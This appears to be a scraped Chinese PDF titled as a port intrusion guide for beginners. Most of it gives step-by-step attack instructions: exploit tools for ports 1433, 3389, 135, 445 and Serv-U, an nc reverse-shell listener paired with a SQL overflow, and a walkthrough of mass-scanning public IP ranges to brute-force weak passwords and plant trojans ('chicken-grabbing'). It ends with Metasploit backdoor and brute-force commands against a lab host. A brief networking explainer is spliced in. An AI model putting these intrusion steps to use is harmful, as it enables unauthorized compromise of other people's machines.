端口入侵&攻击
- 格式:pdf
- 大小:1.70 MB
- 文档页数:42
各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。
(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。
(小榕的注入软件)。
5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。
(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。
(servlocal.exe)======================================对serv-u的MD5加密密码,可以用字典暴破。
(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。
如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。
7. 6129端口用DameWare6129.exe入侵。
8. 系统漏洞利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
9. 3127等端口可以利用doom病毒开的端口,用nodoom.exe入侵。
计算机“端口”是英文port的义译,可以认为是计算机与外界通讯交流的出口。
其中硬件领域的端口又称接口,如:USB端口、串行端口等。
软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入输出)缓冲区。
可以先了解面向连接和无连接协议(Connection-Oriented and Connectionless Protocols)面向连接服务的主要特点有:面向连接服务要经过三个阶段:数据传数前,先建立连接,连接建立后再传输数据,数据传送完后,释放连接。
面向连接服务,可确保数据传送的次序和传输的可靠性无连接服务的特点是:无连接服务只有传输数据阶段。
消除了除数据通信外的其它开销。
只要发送实体是活跃的,无须接收实体也是活跃的。
它的优点是灵活方便、迅速,特别适合于传送少量零星的报文,但无连接服务不能防止报文的丢失、重复或失序。
区分“面向连接服务”和“无连接服务”的概念,特别简单、形象的例子是:打电话和写信。
两个人如果要通电话,必须先建立连接——拨号,等待应答后才能相互传递信息,最后还要释放连接——挂电话。
写信就没有那么复杂了,地址姓名填好以后直接往邮筒一扔,收信人就能收到。
TCP/IP协议在网络层是无连接的(数据包只管往网上发,如何传输和到达以及是否到达由网络设备来管理)。
而“端口”,是传输层的内容,是面向连接的。
协议里面低于1024的端口都有确切的定义,它们对应着因特网上常见的一些服务。
这些常见的服务可以划分为使用TCP端口(面向连接如打电话)和使用UDP端口(无连接如写信)两种。
网络中可以被命名和寻址的通信端口是操作系统的一种可分配资源。
由网络OSI(开放系统互联参考模型,Open System Interconnection Reference Model)七层协议可知,传输层与网络层最大的区别是传输层提供进程通信能力,网络通信的最终地址不仅包括主机地址,还包括可描述进程的某种标识。
135端口入侵详解135端口入侵详解(附件在下面)(环境:电信拨号上网,外网,系统WIN XP,此方法可能不适合内网或其他系统)经测试,入侵成功率100%,扫描时间可能较长,要有足够耐心,如扫不到135端口,可能是被当地电信屏蔽或内网未作映射,相关服务未开启或本地端口未打开(如135,139,445等),还有可能是未关闭主机杀软,WIN XP自带防火墙或其他防火墙(如瑞星防火墙等等)。
本人主机找135端口可是一扫一大片。
135端口扫描工具: X-way2.5 (可用其他IP扫描工具)IP整理工具:黑色旋风IP(可用其他IP整理工具)弱口令筛选工具: ntscan10 汉化版远程登录工具: recton声明:(下载以上文件杀软会报毒,使用后果自负)先确定打开了下列服务:TCP/IP NetBIOS HelperRemote Procedure Call (RPC) LocatorNT LM Security Support Provider运行X-way.exe打开主界面,左边工具栏选主机搜索,中间弹出窗填要扫描的起始IP地址,建议扫描本地网。
如自己的上网IP地址为58.54.144.20,可填起始地址为58.54.0.20,结束地址为58.54.255.20。
(注意结束地址比起始地址大)。
自己的上网IP可在/doc/3315772664.html,主页下部实用查询里的IP地址页看到。
注意机器重启后上网IP会发生改变。
搜索方式选端口方式(默认),线程设置里线程数可改为50-1000任选(根据机器性能)。
这里说明一下,WIN XP 默认连接数为10,需先进行线程破解,网上工具很多,实在不行下载迅雷,迅雷软件界面顶端工具栏展开后选系统优化工具,修改连接数最大支持1024,重启后生效。
X-way主机搜索界面,线程设置下面点击高级设置,弹出主机搜索各参数设置窗口,端口设置里勾选other,端口139(默认)改为135,连接延时改为2秒,其他不变,关闭回到主机搜索界面。
无论是高手还是菜鸟,大家都知道常见的高危端口:135,139,3389,445等。
大家唯恐不能快点关闭这些端口以及相应的服务来保证系统的安全。
其实本人认为这是错误的,黑客技术是建立在攻与防之间的,下面看本人的135实战原理分析,以及135端口的安全防御!一,工具攻防现在在网上,有很多的135抓鸡器,都是全自动的,利用135端口往往能抓很多肉鸡,为什么呢?因为正版系统为了性能都是开启这些高危服务的,而用户是新手或者安全意识不强的话,就不会关闭这些东西,他们也不懂这些,所以就被抓了。
我们从工具的抓鸡过程来分析!图一这是一款典型的135抓鸡器,下面我们来分析一下抓鸡的过程,从攻击的方面来防御!首先扫描,筛选开启135端口的机器,这些都是很普通的。
下面开始扫描弱口令了,从反面的角度来说,135端口入侵需要弱口令(弱口令就是保护强度很弱的密码,比如123)。
接着看溢出,溢出是利用下载马的形式。
实战:1,扫描135端口,然后筛选出弱口令等。
2,启动ftp或者是tftp本地服务器,开启服务,将木马设置放进目录3,按照步骤批量溢出,在此填入你的电脑,以及改变相应的设置图二防御在下面的文章说。
二手动入侵手动入侵是最爽的了,用工具不如手工的灵活。
这样我们就要详细分析下135端口了!我们打开管理,查看服务。
图三众所周知,135端口的服务是RPC。
看RPC的说明,似乎毫无头绪,是的根本看不明白。
下面就说下使用的方法。
在这里,入侵的常见步骤是:1,确定目标2,扫描端口,假设开启了135端口3,开启需要的漏洞服务,比如IPC共享或者telnet我们开始实战!通过上面的描述,作为终结点映射程序和com服务控制管理器使用。
意思就是远程控制电脑的服务。
那这样,我们就连接到远程电脑的服务控制台。
打开服务管理器,在上面点击操作,点击连接到另一台电脑。
图四图五图六连接成功后,我们就可以像本地电脑一样控制服务了。
当然,再重复一遍连接的条件!1,开启135端口也就是RPC服务2,你知道远程电脑的用户名和密码以及修改的权限(或者远程电脑弱口令)这时,我们就可以开启telnet服务,或者其他你需要入侵利用的服务。
常见端⼝⼊侵⼀.信息收集nmap命令:nmap -sS -p 1-65535 -sV 192.168.31.69nmap --script=vuln 192.168.31.69⼆.端⼝利⽤21端⼝⼊侵⾸先看到ftp的版本是proftpd 1.3.3c,经过了解该版本存在后门,利⽤msf中的模块可以进⾏利⽤,利⽤过程如下:利⽤命令:msfconsole 启动终端search proftpd 搜索利⽤模块use exploit/unix/ftp/proftpd_133c_backdoor 使⽤后门模块show options 查看需要设置的参数set rhosts 192.168.31.69 设置⽬标iprun 攻击得到⼀个shell22端⼝⼊侵看到22端⼝就会想到ssh,想到ssh就想爆破⼀下试试,试试就试试命令:search ssh_login 搜索爆破模块use auxiliary/scanner/ssh/ssh_login 使⽤爆破模块show options 查看需要设置的参数set rhosts 192.168.31.69 设置⽬标ipset username root 设置⽤户名为rootset pass_file /root/passwd.txt 设置密码字典set verbose true 显⽰爆破信息run 攻击ssh 连接ssh爆破出密码,⽤户为root密码为123456,并成功连接上ssh873端⼝⼊侵873端⼝搭的服务是rsync,通过百度得知该服务存在未授权访问漏洞,连接试试命令:rsync 连接rsyncrsync www 连接rsync并查看www⽂件夹内的⽂件3306端⼝⼊侵3306端⼝也是可以尝试⼀下爆破,命令如下:search mysql_login 搜索mysql爆破模块use auxiliary/scanner/mysql/mysql_login 使⽤mysql爆破模块show options 查看需要的参数set rhosts 192.168.31.69 设置⽬标ipset username root 设置⽤户名set pass_file /root/passwd.txt 设置密码字典run 攻击search mysql_sql 搜索执⾏sql语句模块use auxiliary/admin/mysql/mysql_sql 使⽤该模块show options 查看需要的参数set rhosts 192.168.31.69 设置⽬标ipset username root 设置⽤户名set password 123456 设置密码set SQL show databases; 设置需要执⾏的sql语句run 攻击爆破出密码,⽤户名为root,密码为123456执⾏show databases;成功列出所有数据库名6379端⼝⼊侵该端⼝使⽤的是redis服务,可能存在未授权访问漏洞,利⽤该漏洞需要安装redis,安装命令如下:tar -xzf redis-2.8.12.tar.gz 解压cd redis-2.8.12/ 切换到解压后的⽬录下make 编译cd /root/redis-2.8.12/src 切换到这个⽬录./redis-cli -h 192.168.31.69 执⾏redis-cli连接得到⼀个shell。